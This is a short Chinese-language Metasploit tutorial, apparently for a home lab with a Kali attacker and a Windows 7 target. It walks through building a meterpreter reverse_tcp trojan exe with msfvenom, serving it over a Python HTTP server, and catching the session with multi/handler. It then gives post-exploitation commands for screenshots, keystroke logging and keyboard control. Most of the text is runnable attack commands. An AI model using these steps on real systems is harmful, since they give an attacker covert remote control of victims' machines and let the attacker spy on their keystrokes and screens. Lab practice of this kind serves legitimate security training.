msf 获取session
在kali终端中打开msfconsole控制台
开启监听
use exploit/multi/handler
设置tcp监听
set payload windows/meterpreter/reverse_tcp
再次开启一个终端进行(shift+ctrl+T),查看本机ip
利用msfvenom制作木马程序
说明:-p payload(有效载荷) 通俗的讲payload是用来建立目标机与攻击机稳定连接的,可以返回shell
-e 编码方式
-i 编码次数
-b 在生成的程序中避免出现的值
-f exe 生成exe格式
msfvenom -p windows/meterpreter/reverse_tcp lhost=172.27.7.10 lport=4444 -f exe >/tmp/hack.exe
将木马传到目标主机
这里使用python -m SimpleHTTPServer 800搭建一个http服务,提供一个文件浏览的web页面到800端口
打开目标机win7,输入地址进行下载木马并保存在桌面
下载过程 回显
返回第二步界面,设置监听主机,运行
在win7中打开msf.exe木马文件,再次查看msf控制台
可以看到得了session
11.查看session,如果此时是meterpreter,输入background即可返回msf exploit(multi/handler)
查看系统信息:sysinfo
截取时下桌面:screenshot
捕获击键记录:keyscan start
控制键盘鼠标 启用/禁用:uictl enable/disable keyboard